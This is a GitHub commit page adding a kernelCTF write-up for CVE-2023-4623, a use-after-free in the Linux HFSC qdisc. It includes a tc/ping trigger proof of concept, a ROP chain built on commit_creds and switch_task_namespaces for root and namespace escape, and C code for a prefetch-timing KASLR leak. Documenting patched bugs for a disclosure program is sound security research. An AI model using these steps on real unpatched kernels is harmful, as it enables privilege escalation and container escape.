Skip to content

Commit

Permalink
Add kernelCTF CVE-2023-4623_lts_cos (#110)
Browse files Browse the repository at this point in the history
* Add CVE-2023-4623_lts_cos

* Remove unnecessary function

* Add comments

* Fix side-channel reliability

* Add docs

* Update Makefile

* Use seperate KASLR leak

* Make requested changes
  • Loading branch information
hexfoureight authored Aug 2, 2024
1 parent 0226d51 commit 361a3fb
Show file tree
Hide file tree
Showing 11 changed files with 1,232 additions and 0 deletions.
184 changes: 184 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,184 @@
## Overview

The vulnerability leads to a use-after-free on an `hfsc_class` object in `hfsc_dequeue()`. By replacing the vulnerable `hfsc_class` with a crafted `simple_xattr`, we can make `hfsc_dequeue()` perform a write-what-where. This is used to overwrite a function pointer in the kernel's `.data` section that is then called to execute a ROP chain and escape the namespace. The kernel base slide, which is needed to determine the write primitive's target address and ROP gadget addresses, is leaked using a prefetch timing side-channel.

## Setup

The exploit enters a network namespace as root in order to get `CAP_NET_ADMIN`:

```
unshare(CLONE_NEWUSER);
unshare(CLONE_NEWNET);
```
A temporary file is opened to attach attributes to for the `simple_xattr` spray:
```
xattr_fd = open("/tmp/", O_TMPFILE | O_RDWR, 0664);
```
If the kernel base is not provided, `kaslr_leak()` leaks it using a prefetch side-channel (see final section for details).

## Triggering the Vulnerability

To trigger the vulnerability, we need to set up an HFSC qdisc and send packets to it. We will need to open two types of sockets: an `AF_NETLINK` socket for configuring the qdisc and an `AF_INET` socket for enqueueing packets at the qdisc. The qdisc is set up on `lo` by sending preconstructed messages to the Netlink socket. The `tf_msg` struct is used to represent the Netlink route messages, which are constructed in `init_nl_msgs()`. The following sequence of messages is sent:

- `if_up_msg` sets `lo` up so that packets can be sent to the qdisc.
- `newqd_msg` attaches an HFSC qdisc to `lo`.
- `new_rsc_msg` adds a class with an RSC (real-time service curve) to the qdisc as a child of the root class.
- `new_fsc_msg` adds a class with an FSC (link-sharing service curve) to the qdisc as a child of the RSC class.
- At this point an `AF_INET` socket is opened and written to with `loopback_send()`. The message will be enqueued in the FSC class, causing the RSC class to be mistakenly added to the root class's `vt_tree`.
- `delc_msg` deletes the FSC class, then another `delc_msg` deletes the RSC class, leaving a dangling pointer to the underlying `hfsc_class` object in the root class's `vt_tree`.

## Write-What-Where

The use-after-free is reached via [`hfsc_dequeue()`](https://elixir.bootlin.com/linux/v6.1.36/source/net/sched/sch_hfsc.c#L1570 "https://elixir.bootlin.com/linux/v6.1.36/source/net/sched/sch_hfsc.c#L1570"), which calls `vttree_get_kminvt()`:

```
static struct hfsc_class *
vttree_get_minvt(struct hfsc_class *cl, u64 cur_time)
{
/* if root-class's cfmin is bigger than cur_time nothing to do */
if (cl->cl_cfmin > cur_time)
return NULL;
while (cl->level > 0) {
cl = vttree_firstfit(cl, cur_time);
if (cl == NULL)
return NULL;
/*
* update parent's cl_cvtmin.
*/
if (cl->cl_parent->cl_cvtmin < cl->cl_vt)
cl->cl_parent->cl_cvtmin = cl->cl_vt;
}
return cl;
}
```

The loop will eventually assign our dangling pointer to `cl`. Then the line
```
cl->cl_parent->cl_cvtmin = cl->cl_vt;
```
gives us an 8-byte write-what-where primitive with the restriction that the value written is greater than what it is replacing. This primitive will be used to overwrite the `qfq_qdisc_ops.change()` function pointer in the kernel's `.data` section with a JOP gadget. Since the QFQ qdisc does not define a change function, `qfq_qdisc_ops.change()` is initially `NULL` and can be overwritten with any value.

A `simple_xattr` is used to store the target address and value. The exploit uses `spray_simple_xattrs()` to add attributes to a temporary file, which sprays the `kmalloc-1024` cache where the vulnerable `hfsc_class` is located with `simple_xattr` objects.

The `value` field of `simple_xattr` is filled with a fake `hfsc_class`. The following fields have to be faked:

- `cl_parent`: The address to write to minus `offsetof(hfsc_class, cl_cvtmin)`. Set to the address of `qfq_qdisc_ops.change()`.
- `cl_vt`: The 8-byte value to write. Set to the address of a JOP gadget.
- `cl_f`: Set to zero to satisfy the `p->cl_f <= cur_time` condition in `vttree_firstfit()`.
- `level`: Set to a non-zero value to prevent `vttree_get_minvt()` from returning the dangling pointer and causing further use-after-frees.
- `vt_node`: This is the red-black tree node that the vulnerable class is accessed through. We make this a black node with `NULL` children to prevent crashes in `init_vf()` and `vttree_get_minvt()`.
- `vt_node.__rb_parent_color`: Set to 1, coloring the node black.
- `vt_node.rb_right`: Set to `NULL` so that it is not dereferenced.
- `vt_node.rb_left`: Set to `NULL` so that it is not dereferenced.
- `cf_node`: There is another dangling pointer to the vulnerable class from root class's `cf_tree`. This is filled in the same way as `vt_node` to prevent a crash in `init_vf()` but is not otherwise relevant.

Once a `simple_xattr` has been allocated over the vulnerable `hfsc_class`, another FSC class is created with `new_fsc_msg` so that the qdisc has somewhere to enqueue packets (`hfsc_dequeue()` will return early if the qdisc is empty.) The write-what-where in `hfsc_dequeue()` is then triggered by sending an `AF_INET` packet with the `loopback_send()` helper function.

## ROP Chain

Now that `qfq_qdisc_ops.change()` has been overwritten, it can be called by sending the `new_qfq_qdisc` message to a Netlink socket. The kernel will then call the overwritten pointer from `qdisc_change()` with `rsi` pointing to the middle of sent message. The data around `rsi` is attacker controlled and contains the ROP chain.

The `new_qfq_qdisc` message is constructed with two consecutive `TCA_OPTIONS` attributes, each of which consists of a 4-byte `rtattr` header followed by a data buffer. When the overwritten function is called, `rsi` will point to the second attribute, whose data buffer stores a ROP chain copied from `rop_buf`. The preceding attribute's buffer contains a single gadget, copied from `jop_buf` and found at `rsi - 0x70` when the chain is executed.

The chain starts by calling the JOP gadget stored at `qfq_qdisc_ops.change()`:
```
push rsi ; jmp qword ptr [rsi - 0x70]
```
The gadget at `rsi - 0x70` then completes the stack pivot to the ROP chain at `rsi + 8` (the offset of `8` is needed to skip the `rtattr` header):
```
pop rsp ; pop rbx ; jmp __x86_return_thunk // rsi - 0x70
```
The ROP chain starts by copying `rdi` into `rbx`, which restores `rbx`'s previous value:
```
push rdi ; pop rbx ; pop rbp ; jmp __x86_return_thunk // rsi + 0x8
0
```
This is necessary becuase the chain will eventually return back to the kernel stack and `rbx` is callee saved. After this the usual privilege escalation and namespace escape is performed using `commit_creds()` and `switch_task_namespaces()`:
```
pop rdi ; jmp __x86_return_thunk
0
prepare_kernel_cred()
pop rcx ; jmp __x86_return_thunk
commit_creds()
mov rdi, rax ; jmp __x86_indirect_thunk_rcx
pop rdi ; jmp __x86_return_thunk
1
find_task_by_vpid()
pop rsi ; jmp __x86_return_thunk
init_ns_proxy
pop rcx ; jmp __x86_return_thunk
switch_task_namespaces()
mov rdi, rax ; jmp __x86_indirect_thunk_rcx
```

The ROP chain ends by pivoting back to the previous frame on the kernel stack. A kernel stack pointer can be read from `r14` on the LTS instance and `r13` on the COS instance. An offset of `-384` or `-368` is added to this pointer to get the location of the target frame on LTS and COS, respectively. Here are the the gadgets for LTS:

```
mov rax, r14 ; pop r14 ; jmp __x86_return_thunk
0
pop rdx ; jmp __x86_return_thunk
pop r14 ; jmp __x86_return_thunk
push rax ; jmp __x86_indirect_thunk_rdx
pop rcx ; jmp __x86_return_thunk
-384
add rax, rcx ; jmp __x86_return_thunk
pop rdx ; jmp __x86_return_thunk
pop rsp ; jmp __x86_return_thunk
push rax ; jmp __x86_indirect_thunk_rdx
```
and COS:
```
mov rax, r13 ; pop r13 ; pop rbp ; jmp __x86_return_thunk
0
0
pop rsi ; jmp __x86_return_thunk
-368
add rax, rsi ; jmp __x86_return_thunk
pop rdx ; jmp __x86_return_thunk
pop rsp ; jmp __x86_return_thunk
push rax ; jmp __x86_indirect_thunk_rdx
```
## Infoleak with Prefetch Timing Side-channel

A simple implementation the prefetch timing side-channel (described in this [P0 blog post](https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html "https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html") and originally from this [paper](https://gruss.cc/files/prefetch.pdf "https://gruss.cc/files/prefetch.pdf") by Daniel Gruss et al.) is used to bypass KASLR. This side-channel exploits timing differences in `prefetch` instructions based on whether the target address is mapped and the cache state.

Addresses which are mapped and have been recently accessed have a faster prefetch time than unmapped addresses (`prefetch` itself does not count as an access here). We access `sys_getuid()` by calling `getuid()` and then measure prefetch times for all possible locations of `sys_getuid()`. The target instance's kernel base is always located at a `0x1000000` aligned address between `0xffffffff81000000` and `0xffffffffbb000000`, so there are 59 candidate addresses to test.

The attack first finds the minimum prefetch time `min` for the unmapped address `0xffffffff80000000`. Prefetch times for other unmapped addresses will likely be greater than or equal to to `min`, so any address with a faster prefetch time is assumed to be mapped. The lowest mapped address found this way is taken to be the kernel base.



```
#define MIN_STEXT 0xffffffff81000000
#define MAX_STEXT 0xffffffffbb000000
#define BASE_INC 0x1000000
long kaslr_leak (int tries1, int tries2) {
long base = -1, addr;
size_t time;
size_t min = -1;
addr = 0xffffffff80000000;
for (int i = 0; i < tries1; i++) {
time = onlyreload(addr);
min = min < time ? min : time;
}
for (int i = 0; i < tries2; i++) {
for (addr = MIN_STEXT; addr <= MAX_STEXT; addr += BASE_INC) {
time = onlyreload(addr + SYS_GETUID);
if (time < min && addr < base) {
base = addr;
}
}
}
return base;
}
```

The prefetch timing assembly code in `onlyreload()` is taken from Daniel Gruss's [repository](https://github.com/IAIK/prefetch "https://github.com/IAIK/prefetch") with `cpuid` replaced by `mfence` as suggested in the P0 blog post.

The original exploit did not preload the target address, but the leak will not work reliably without this on the current server (likely due to increased cache activity).

This implementation of the side-channel works on the Intel Xeon CPU used by the live instance but not the AMD CPU used by the exploit_repro instance, since there is no timing difference between the two cases it tests for on AMD.
35 changes: 35 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
## Vulnerability Details

There is a use-after-free in the traffic control system's HFSC qdisc when a HFSC class with link-sharing has a parent without link-sharing. When a packet is enqueued at the the child class, `init_vf()` will call `vttree_insert()` on the parent. However, when the packet is dequeued, `vttree_remove()` will be skipped in `update_vf()` since the parent does not have the `HFSC_FSC` flag set. This leaves a dangling pointer which can be exploited to cause a use-after-free and achieve privilege escalation.

The vulnerability has been present since the HFSC qdisc was introduced in kernel version 2.6.3. It was fixed in version 6.5 with commit `b3d26c5702c7 ("net/sched: sch_hfsc: Ensure inner classes have fsc curve")`. This commit made it impossible for classes without link-sharing curves to become parents, since only inner classes with link-sharing curves are meaningful in the HFSC protocol.

Triggering the vulnerability requires `CONFIG_NET_SCH_HFSC` to be enabled in the kernel configuration. The user must have the `CAP_NET_ADMIN` capability to trigger the vulnerability, which can be gained with access to unprivileged user namespaces. Disabling unprivileged user namespaces prevents the vulnerability from being exploited for privilege escalation.

## POC
```
# Set lo up
ip link set lo up
# Create the HFSC qdisc and root class.
tc qdisc add dev lo parent root handle 1: hfsc def 2
# Add a real-time class as a child of root class.
tc class add dev lo parent 1: classid 1:1 hfsc rt umax 1 dmax 1 rate 1
# Add a link-sharing class as a child of the real-time class.
tc class add dev lo parent 1:1 classid 1:2 hfsc ls umax 1 dmax 1 rate 1
# Enqueue packet at link-sharing class, which calls init_vf() on it.
ping -c1 localhost
# Delete the parent and child classes, leaving a dangling pointer.
tc class del dev lo classid 1:2
tc class del dev lo classid 1:1
# Add a link-sharing class to enqueue packets to (if the queue is empty, hfsc_dequeue() will return before reaching the UaF)
tc class add dev lo parent 1: classid 1:2 hfsc ls umax 1 dmax 1 rate 1
# Trigger use after free in hfsc_dequeue()
ping -c1 localhost
```
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
CFLAGS = -Wno-incompatible-pointer-types -Wno-format -static

exploit: exploit.c

run:
./exploit
Binary file not shown.
Loading

0 comments on commit 361a3fb

Please sign in to comment.